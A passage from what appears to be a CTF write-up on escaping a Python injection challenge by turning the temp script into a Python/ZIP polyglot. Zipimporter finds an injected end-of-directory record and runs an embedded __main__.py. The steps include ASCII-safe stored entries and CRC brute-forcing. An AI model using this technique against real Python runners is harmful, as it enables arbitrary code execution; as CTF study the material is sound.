<p>The most prominent change is the full integration of <strong>type parameters</strong> (e.g., <code>def func[T]():</code>, <code>class MyClass[T]:</code>) and the new type statement for <strong>type aliases</strong> (<code>type MyType = int</code>) into the AST and parsing logic.</p>
</li>
<li>
<p><code>Python.asdl</code> was updated to define the AST nodes for <code>TypeAlias</code> and <code>type_param</code> (including <code>TypeVar</code>, <code>ParamSpec</code>, <code>TypeVarTuple</code>).</p>
</li>
<li>
<p><code>parser.c</code> gained new PEG grammar rules to parse these new syntax elements.</p>
</li>
<li>
<p><code>action_helpers.c</code> was updated to handle the construction of AST nodes with the new <code>type_params</code> fields.</p>
</li>
<li>
<p>This indicates a forward-looking enhancement to support more advanced static typing features in Python.</p>
</li>
</ul>
<ol start="2">
<li>
<p><strong>Refactoring and Modernization of the Parser Core</strong>:</p>
</li>
</ol>
<ul>
<li>There's a consistent effort to modernize and improve the C-API usage and internal mechanisms of the PEG parser.</li>
<li><strong>Reference Counting</strong>: Widespread adoption of <code>Py_NewRef</code> and <code>PyUnicode_InternImmortal</code> over <code>Py_INCREF</code> and <code>PyUnicode_InternInPlace</code> across <code>asdl_c.py</code> and <code>pegen.c</code>, reflecting best practices for C-API usage and better support for multi-interpreter environments.</li>
<li><strong>Tokenization and Error Handling</strong>: The Token struct in <code>pegen.h</code> now supports metadata, and the tokenization process in <code>pegen.c</code> and <code>pegen_errors.c</code> is more robust, using a structured struct token and improved lifecycle management. Error reporting has become more precise with <code>use_mark</code> and better f-string error propagation.</li>
<li><strong>F-string Parsing Overhaul</strong>: The dedicated FstringParser mechanism in <code>string_parser.c</code> and <code>string_parser.h</code> has been completely removed and replaced with a more integrated approach. This suggests that f-string parsing is now handled more directly by the core PEG parser, likely simplifying the codebase and improving performance.</li>
<li><strong>Thread and Subinterpreter Safety</strong>: Changes in <code>myreadline.c</code> explicitly address thread safety and subinterpreter isolation for global callbacks, ensuring the parser behaves correctly in complex runtime environments.</li>
</ul>
</blockquote>
<ul>
<li><strong>Performance and Debugging</strong>: Refactoring of byte-to-character offset calculations in <code>pegen.c</code> for better UTF-8 handling, and the addition of a debug field to the Parser struct, point towards ongoing performance optimizations and improved debugging capabilities.</li>
</ul>
<p>Most of these were not really relevant at all, and the only interesting lead was the f-string parsing.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="json" data-theme="github-dark-dimmed"><code data-language="json" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#8DDB8C">      "old_file"</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"./old/Parser/string_parser.c"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#8DDB8C">      "new_file"</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"./new/Parser/string_parser.c"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#8DDB8C">      "summary"</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"Complete redesign of string and f-string parsing, replacing the old FstringParser mechanism with a more integrated and generalized approach."</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#FF938A;font-style:italic">      ...</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>The description was something like this:</p>
<blockquote>
<p>The <code>string_parser.c</code> file has undergone a complete overhaul in its approach to parsing f-strings and possibly other string literals. The old <code>FstringParser</code> struct and its associated helper functions (e.g.,<code>_PyPegen_FstringParser_Init</code>,<code>_PyPegen_FstringParser_ConcatFstring</code>,<code>_PyPegen_FstringParser_Finish</code>) have been entirely removed. They are replaced by new, more generalized functions like <code>_PyPegen_parse_string</code> and <code>_PyPegen_decode_string</code>. This indicates that the complex, stateful f-string parsing mechanism has been replaced with a simpler, more integrated approach, likely leveraging the enhanced token and parser infrastructure (as seen in <code>pegen.c</code> and <code>pegen.h</code>).</p>
</blockquote>
<p>This was a bit of a long shot, given that our injection point wasn't even in an f-string. But I decided to look into it anyway, and got side-tracked for an hour or so understanding how it worked. I now know way too much about Python's parser internals, but for the purposes of this writeup, I will skip the details. All you need to know is that this was a dead end...</p>
<h2>Idea 2: Polyglot Files</h2>
<p>When solving CTF challenges, a strategy I taught myself was timeboxing each lead to a few hours, and if I didn't make any progress, I would step back and look at the big picture again. At this point I had spent almost half a day on looking for parser bugs and was getting nowhere.</p>
<p>I looked at the challenge again. We're running a file from the command line: <code>python3 &lt;temp_filename&gt;</code>. We don't control the filename, which always ends in <code>.py</code>, but we do control the contents of the file to a limited extent.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">result </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> subprocess.run(</span></span>
<span data-line=""><span style="color:#ADBAC7">    [</span><span style="color:#96D0FF">"python3"</span><span style="color:#ADBAC7">, temp_filename], </span><span style="color:#F69D50">capture_output</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">text</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">timeout</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">5</span></span>
<span data-line=""><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<p>I vaguely remembered that <code>.pyc</code> files (compiled Python bytecode) can be run from the command line just like a regular <code>.py</code> file can, and would run even if renamed to have a <code>.py</code> extension.</p>
<figure class="mx-auto"><img alt="Discord Chat" loading="lazy" width="526" height="120" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat2.a19bb4d9.png&amp;w=640&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat2.a19bb4d9.png&amp;w=1080&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat2.a19bb4d9.png&amp;w=1080&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>This was yet another <strong><em>long</em></strong> shot, because <code>.pyc</code> files have magic headers, defined by <a href="https://github.com/python/cpython/blob/11503211c6e8985a305f8e2a8530e2258f982180/Include/internal/pycore_magic_number.h#L297-L301"><code>PYC_MAGIC_NUMBER_TOKEN</code> in <code>pycore_magic_number.h</code></a>, that appear at the start of the file, and we don't control the start of the file. More details about the <code>.pyc</code> format <a href="https://nedbatchelder.com/blog/200804/the_structure_of_pyc_files.html">here</a>.</p>
<p>But this got me thinking about understanding the way Python decides what kind of file it is dealing with, since it clearly doesn't infer that from the file extension.</p>
<h2>Understanding Python's File Type Detection</h2>
<h3>Hacktron to the Rescue</h3>
<p>At this point, we've been testing a new internal debug UI for experimenting with our agents. Here's me giving it a spin with a task to find out how Python handles file types:</p>
<figure class="mx-auto"><img alt="Debug UI" loading="lazy" width="1772" height="1104" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_1.4c4b4552.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_1.4c4b4552.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_1.4c4b4552.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>Looking at the resulting trace, I found an interesting snippet:</p>
<blockquote>
<p>The central dispatch logic resides in an if/else if/else block starting at <a href="https://github.com/python/cpython/blob/3.11/Modules/main.c#L595-L609"><code>Modules/main.c:603</code></a>:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">   if</span><span style="color:#ADBAC7"> (config</span><span style="color:#FF938A;font-style:italic">-&gt;</span><span style="color:#ADBAC7">run_command) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode = pymain_run_command(config</span><span style="color:#FF938A;font-style:italic">-&gt;</span><span style="color:#ADBAC7">run_command);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#F47067"> if</span><span style="color:#ADBAC7"> (config</span><span style="color:#FF938A;font-style:italic">-&gt;</span><span style="color:#ADBAC7">run_module) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode = pymain_run_module(config</span><span style="color:#FF938A;font-style:italic">-&gt;</span><span style="color:#ADBAC7">run_module, </span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#F47067"> if</span><span style="color:#ADBAC7"> (main_importer_path </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode = pymain_run_module(L</span><span style="color:#96D0FF">"__main__"</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#F47067"> if</span><span style="color:#ADBAC7"> (config</span><span style="color:#FF938A;font-style:italic">-&gt;</span><span style="color:#ADBAC7">run_filename </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode = pymain_run_file(config);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#ADBAC7"> {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode = pymain_run_stdin(config);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span></code></pre></figure>
<ul>
<li><strong>Command Execution (<code>run_command</code>)</strong>: If the <code>run_command</code> field of the <code>PyConfig</code> struct is set (typically via the <code>-c</code> command-line flag), the interpreter executes the provided string as a Python command by calling <code>pymain_run_command</code>.</li>
<li><strong>Module Execution (<code>run_module</code>)</strong>: If <code>run_command</code> is not set but <code>run_module</code> is (typically via the <code>-m</code> flag), the interpreter runs the specified module by calling <code>pymain_run_module</code>.</li>
<li><strong>Package Execution</strong>: An interesting case arises if <code>main_importer_path</code> is not <code>NULL</code>. This variable is set earlier in the function (at <a href="https://github.com/python/cpython/tree/d542a9be51776e8d589363ee15164dec8dbd3a76/Modules/main.c#L557-L567">Modules/main.c:562</a>) if the <code>run_filename</code> points to a directory or a ZIP archive containing a <code>__main__.py</code> file. In this scenario, the interpreter executes the package as a module by calling <code>pymain_run_module(L"__main__", 0)</code>.</li>
<li><strong>File Execution (<code>run_filename</code>)</strong>: If none of the above conditions are met and <code>run_filename</code> is set, the interpreter proceeds to execute a script from a file. This is the most common execution path when a script is passed as a command-line argument.</li>
<li><strong>Interactive Mode / Stdin</strong>: If no command, module, or filename is provided, the interpreter falls back to <code>pymain_run_stdin</code>. This function is responsible for either reading and executing code from standard input or, if the input is a TTY, starting the interactive Read-Eval-Print Loop (REPL).</li>
</ul>
</blockquote>
<p>The package execution case was particularly interesting! If the <code>main_importer_path</code> is set, then the logic is different from running a Python script directly, and this is the case when the filename "<strong>points to a directory or a ZIP archive containing a <code>__main__.py</code> file</strong>".</p>
<p>Apparently, Python had allowed the interpreter to execute ZIP files <a href="https://bugs.python.org/issue1739468">since version 2.6</a>. This was intended for the use of ZIP archives as a way to distribute Python packages, but this also meant that if we could somehow get Python to treat our file as a ZIP archive we could potentially execute arbitrary code.</p>
<p>As suggested by the trace, the relevant code that determines the <code>main_importer_path</code> is as follows:</p>
<p><a href="https://github.com/python/cpython/blob/d542a9be51776e8d589363ee15164dec8dbd3a76/Modules/main.c#L557-L567"><code>Modules/main.c:557</code></a></p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="c" data-theme="github-dark-dimmed"><code data-language="c" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_filename </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#768390">    /* If filename is a package (ex: directory or ZIP file) which contains</span></span>
<span data-line=""><span style="color:#768390">        __main__.py, main_importer_path is set to filename and will be</span></span>
<span data-line=""><span style="color:#768390">        prepended to sys.path.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390">        Otherwise, main_importer_path is left unchanged. */</span></span>
<span data-line=""><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (</span><span style="color:#DCBDFB">pymain_get_importer</span><span style="color:#ADBAC7">(config-&gt;run_filename, </span><span style="color:#F47067">&amp;</span><span style="color:#ADBAC7">main_importer_path,</span></span>
<span data-line=""><span style="color:#ADBAC7">                            exitcode)) {</span></span>
<span data-line=""><span style="color:#F47067">        return</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#ADBAC7">    }</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>I put Hacktron to work again to figure out how <code>pymain_get_importer</code> determines whether the file is a ZIP archive, and how the archive is parsed. I gave it the following task:</p>
<blockquote>
<p>In <code>Modules/main.c</code>, the following code determines whether a ZIP file is run.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="c" data-theme="github-dark-dimmed"><code data-language="c" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_filename </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#768390">    /* If filename is a package (ex: directory or ZIP file) which contains</span></span>
<span data-line=""><span style="color:#768390">        **main**.py, main_importer_path is set to filename and will be</span></span>
<span data-line=""><span style="color:#768390">        prepended to sys.path.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390">      Otherwise, main_importer_path is left unchanged. */</span></span>
<span data-line=""><span style="color:#F47067">   if</span><span style="color:#ADBAC7"> (</span><span style="color:#DCBDFB">pymain_get_importer</span><span style="color:#ADBAC7">(config-&gt;run_filename, </span><span style="color:#F47067">&amp;</span><span style="color:#ADBAC7">main_importer_path,</span></span>
<span data-line=""><span style="color:#ADBAC7">                           exitcode)) {</span></span>
<span data-line=""><span style="color:#F47067">       return</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Trace the relevant code paths to explain in detail how a ZIP file is detected, and how it is parsed. Follow all associated paths fully, and provide a clear chronological explanation from file type detection to execution.</p>
</blockquote>
<p>and got it to produce some customised structured output.</p>
<figure class="mx-auto"><img alt="Debug UI" loading="lazy" width="1771" height="1188" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_2.994aca66.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_2.994aca66.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_2.994aca66.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>First, we learn that the <code>zipimporter</code> class is one of the importer hooks that <code>PyImport_GetImporter</code> attempts to use (it is also the first one).</p>
<blockquote>
<p>The process begins in <code>Modules/main.c</code> with <code>pymain_get_importer</code> being called if <code>config-&gt;run_filename</code> is set. This function acts as a bridge to the Python import system, calling <code>PyImport_GetImporter</code>. <code>PyImport_GetImporter</code> retrieves <code>sys.path_hooks</code>, a list of callable importer hooks.</p>
<p>Crucially, during Python's initialization, the <code>zipimporter</code> class from the <code>zipimport</code> module is imported and inserted at the beginning of <code>sys.path_hooks</code>. This ensures <code>zipimporter</code> is the first to attempt to handle the <code>run_filename</code>.</p>
<p>The actual ZIP file detection occurs within the <code>zipimporter</code>'s <code>__init__</code> method. It verifies the path exists and is a regular file, then calls <code>_read_directory</code>. <code>_read_directory</code> parses the ZIP file structure by seeking the 'End of Central Directory Record' (identified by magic bytes <code>b'PK\x05\x06'</code>) and building an internal dictionary of file metadata. If the file does not conform to the ZIP format, a <code>ZipImportError</code> is raised.</p>
</blockquote>
<p>Crucially, it appears that <code>_read_directory</code> will start parsing the ZIP file structure as long as it finds an <em>End of Central Directory Record</em> (EOCD), which (as the name suggests) appears towards the <strong><em>end</em></strong> of the file. This solves our problem of only being able to control the middle of the file, since we can simply add a valid EOCD towards the end of our input, and make the trailing junk part of the EOCD record. A quick look at the <a href="https://en.wikipedia.org/wiki/ZIP_(file_format)#End_of_central_directory_record_(EOCD)">Wikipedia page</a> tells us that the EOCD record can end with a comment. More on this later!</p>
<figure class="mx-auto"><img alt="EOCD Wiki" loading="lazy" width="1352" height="678" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Feocd_wiki.6451ace7.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Feocd_wiki.6451ace7.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Feocd_wiki.6451ace7.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>Next, we learn the expected format of the ZIP file. We just need a ZIP file that contains either a <code>__main__.py</code> or <code>__main__.pyc</code> file, which is what the interpreter will look for when it tries to run the ZIP file.</p>
<blockquote>
<p>Once <code>run_filename</code> is identified as a valid ZIP file, the <code>zipimporter</code> instance is returned. The interpreter then interacts with this instance to locate <code>__main__.py</code>.</p>
<p>It calls <code>find_spec('__main__')</code> on the <code>zipimporter</code>, which in turn calls <code>_get_module_info</code>. <code>_get_module_info</code> constructs potential paths for the module (e.g., <code>__main__.py</code>, <code>__main__.pyc</code>) and checks if these exist within the <code>self._files</code> dictionary (populated during the detection phase).</p>
<p>If <code>__main__.py</code> (or <code>__main__.pyc</code>) is found, <code>find_spec</code> returns a <code>ModuleSpec</code> object. This <code>ModuleSpec</code> indicates that the <code>zipimporter</code> is capable of loading the <code>__main__</code> module.</p>
</blockquote>
<h2>Constructing a Valid ZIP File</h2>
<h3>How <code>zipimporter</code> Parses ZIP Files</h3>
<p>Okay, but how does one construct a valid ZIP file that can be executed by the Python interpreter (or can we even)?</p>
<p>To answer this, we first need to understand how <code>zipimporter</code> parses ZIP files. To do this, I modified yet another Hacktron agent to teach me.</p>
<blockquote>
<p>The provided code is the source code for the Python 3.11 CPython implementation.</p>
<p>Your task is to find out how the <code>zipimporter</code> parses ZIP files. You need to explain clearly how a valid ZIP file is parsed, and whether an injection into a regular Python file can be used to trick the parser into running a ZIP file.</p>
<p>Explain this process in distinct sections, making reference to source code.</p>
</blockquote>
<p>This gave a pretty good overview, so I won't add my own commentary here:</p>
<blockquote>
<p>When a <code>zipimporter</code> instance is created with a path (e.g., <code>zipimporter('archive.zip')</code>), its <code>__init__</code> method (<code>Lib/zipimport.py:53</code>) calls <code>_read_directory</code>(path) (<code>Lib/zipimport.py:73</code>). This function is responsible for parsing the ZIP file’s central directory and caching its contents.</p>
<p><strong>Identifying a Zip File (Magic Bytes):</strong></p>
<p><code>_read_directory</code> first opens the potential ZIP archive using <code>_io.open_code(archive)</code> (<code>Lib/zipimport.py:339</code>).</p>
<p>It then seeks to the end of the file to locate the End of Central Directory Record (EOCD). It checks for the magic number <code>b'PK\x05\x06'</code> (<code>STRING_END_ARCHIVE</code>) at the expected position (22 bytes from the end) or by searching backwards for it if a comment is present (<code>Lib/zipimport.py:353</code>, <code>Lib/zipimport.py:429</code>). This is the primary indicator that the file is a ZIP archive.</p>
<p><strong>Parsing the Central Directory End (CDE) Record:</strong></p>
<p>Once the EOCD is found, <code>_read_directory</code> unpacks crucial information from it, including the <code>header_size</code> (size of the central directory) and <code>header_offset</code> (offset of the central directory from the start of the archive) using <code>_unpack_uint32</code> (<code>Lib/zipimport.py:378-Lib/zipimport.py:379</code>).</p>
<p><strong>Iterating Through Zip Entries (Central Directory):</strong></p>
<p>The function then seeks to the calculated <code>header_position</code> (start of the Central Directory) (<code>Lib/zipimport.py:390</code>).</p>
<p>It enters a loop, reading each Central Directory File Header (CDFH). Each CDFH must start with the signature <code>b'PK\x01\x02'</code> (<code>Lib/zipimport.py:395</code>).</p>
<p>For each entry, it unpacks metadata such as compression method, data sizes, file offset, and file name length (<code>Lib/zipimport.py:399-Lib/zipimport.py:412</code>). This metadata, including the file name (decoded from bytes, first attempting UTF-8, then CP437/latin1) (<code>Lib/zipimport.py:423-Lib/zipimport.py:429</code>), is stored in an internal dictionary (<code>self._files</code>).</p>
<p><strong>Locating and Loading Modules:</strong></p>
<p>When the import system requests a module (e.g., via <code>find_spec</code> (<code>Lib/zipimport.py:155</code>)), <code>zipimporter</code> uses its <code>cached_files</code> dictionary to determine if the module exists within the archive.</p>
<p>The <code>_get_data(archive, toc_entry)</code> function (<code>Lib/zipimport.py:461</code>) is responsible for retrieving the actual file content. It seeks to the <code>file_offset</code> (which points to the Local File Header, typically starting with <code>PK\x03\x04</code>), reads and skips the local header, and then reads the compressed data.</p>
<p>If the data is compressed (e.g., <code>DEFLATE</code>, method 8), <code>zlib.decompress</code> is used (<code>Lib/zipimport.py:479</code>).</p>
<p>Finally, <code>_get_module_code</code> takes this raw data. If it’s a <code>.pyc</code> file, it validates the bytecode magic number and timestamp, then uses <code>marshal.loads</code> to deserialize the code object. If it’s a <code>.py</code> file, it compiles the source code using Python’s built-in <code>compile</code> function (<code>Lib/zipimport.py:515</code>, <code>Lib/zipimport.py:521</code>). The resulting code object is then executed to load the module.</p>
</blockquote>
<h3>A Brief Overview of the ZIP File Format</h3>
<p>One thing to understand is that the reason why Python's "backwards" parsing of the ZIP file works is because ZIP files are characterised by the EOCD record at the end of the ZIP file. This EOCD record points to the start of a Central Directory (CD) which contains metadata about the files in the ZIP archive, including their names, sizes, and offsets. Each entry in the CD starts with a Central Directory File Header (CDFH), which points to the Local File Header (LFH) of each file, which are followed by the actual (compressed) file data.</p>
<p>Note that both the EOCD and CD headers point "backwards" to an offset earlier in the file. Therefore, it doesn't actually matter what appears <strong><em>before</em></strong> the LFHs, as long as the relative offsets point to the correct locations.</p>
<figure class="mx-auto"><img alt="ZIP File Format" loading="lazy" width="2560" height="1388" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fzip_layout.1c9f4c35.png&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fzip_layout.1c9f4c35.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<h3>Our Plan</h3>
<p>What we want to do is to construct a valid ZIP file as follows (the parts we control are in red, and the parts we don't are in grey):</p>
<figure class="mx-auto"><img alt="File Structure" loading="lazy" width="960" height="540" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fstructure.ed0cba21.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fstructure.ed0cba21.png&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fstructure.ed0cba21.png&amp;w=1920&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>When <code>zipimporter</code> parses the file, it will:</p>
<ol>
<li>Seek to 22 bytes from the end of the file to check for the magic number <code>b'PK\x05\x06'</code> (the EOCD record).</li>
<li>It doesn't find the magic number because we have the trailing junk <code>\r\nprint("Thanks for playing!")</code> at the end of the file, so it will go back to
<code>file_size - MAX_COMMENT_LEN - END_CENTRAL_DIR_SIZE</code> to see if the record exists between earliest possible position and the end of the file based on the maximum possible EOCD comment length.</li>
</ol>
<p><a href="https://github.com/python/cpython/blob/3.11/Lib/zipimport.py#L421-L438"><code>Lib/zipimport.py:421-238</code></a></p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">if</span><span style="color:#ADBAC7"> buffer[:</span><span style="color:#6CB6FF">4</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> STRING_END_ARCHIVE</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#768390">  # Bad: End of Central Dir signature</span></span>
<span data-line=""><span style="color:#768390">  # Check if there's a comment.</span></span>
<span data-line=""><span style="color:#F47067">  try</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">      fp.seek(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">2</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">      file_size </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> fp.tell()</span></span>
<span data-line=""><span style="color:#F47067">  except</span><span style="color:#6CB6FF"> OSError</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#F47067">      raise</span><span style="color:#ADBAC7"> ZipImportError(</span><span style="color:#F47067">f</span><span style="color:#96D0FF">"can't read Zip file: </span><span style="color:#F47067">{</span><span style="color:#ADBAC7">archive</span><span style="color:#F47067">!r}</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#F69D50">                            path</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">archive)</span></span>
<span data-line=""><span style="color:#ADBAC7">  max_comment_start </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> max</span><span style="color:#ADBAC7">(file_size </span><span style="color:#F47067">-</span><span style="color:#6CB6FF"> MAX_COMMENT_LEN</span><span style="color:#F47067"> -</span></span>
<span data-line=""><span style="color:#6CB6FF">                          END_CENTRAL_DIR_SIZE</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#F47067">  try</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#ADBAC7">      fp.seek(max_comment_start)</span></span>
<span data-line=""><span style="color:#ADBAC7">      data </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> fp.read()</span></span>
<span data-line=""><span style="color:#F47067">  except</span><span style="color:#6CB6FF"> OSError</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#F47067">      raise</span><span style="color:#ADBAC7"> ZipImportError(</span><span style="color:#F47067">f</span><span style="color:#96D0FF">"can't read Zip file: </span><span style="color:#F47067">{</span><span style="color:#ADBAC7">archive</span><span style="color:#F47067">!r}</span><span style="color:#96D0FF">"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#F69D50">                            path</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">archive)</span></span>
<span data-line=""><span style="color:#ADBAC7">  pos </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> data.rfind(</span><span style="color:#6CB6FF">STRING_END_ARCHIVE</span><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<ol start="3">
<li>It finds our EOCD record which appears in front of the trailing junk. Our EOCD record will point to the start to our CDFH, which we also control.</li>
<li>The CDFH will point to the LFH, which we also control.</li>
<li>The LFH will point to the actual file data of <code>__main__.py</code>, which we also control.</li>
</ol>
<h3>Making our Payload ASCII-Safe</h3>
<p>There is an additional complication here. Because <code>input()</code> reads a text stream instead of the raw bytes, any bytes <code>\x80</code> and above (which are invalid UTF-8 sequences) will be converted into the surrogate range <code>U+D800</code> to <code>U+DFFF</code>. This will cause the file write to fail, because the<code>f.write()</code> will attempt to encode the string into UTF-8, which will fail if it contains any surrogate pairs.</p>
<p>To avoid this, we need to ensure that our payload is ASCII-safe, i.e. it only contains characters in the range <code>\x00-\x7f</code>.</p>
<p>This is clearly not feasible if the file content is compressed, but thankfully the ZIP format allows us to store files without compression by setting the compression method to <code>0</code> (i.e. <code>ZIP_STORED</code>). This is specified by the compression method field in the CDFH.</p>
<p>An additional place where this problem occurs is in the CRC-32 checksum computed over the uncompressed file data. To get around this, we can just brute-force a suffix to place at the end of our <code>__main__.py</code> file that will make the CRC-32 checksum ASCII-safe, as shown in the diagram above.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> ascii_safe</span><span style="color:#ADBAC7">(x: </span><span style="color:#6CB6FF">int</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">bool</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#96D0FF">    """True if all four bytes have high bit clear."""</span></span>
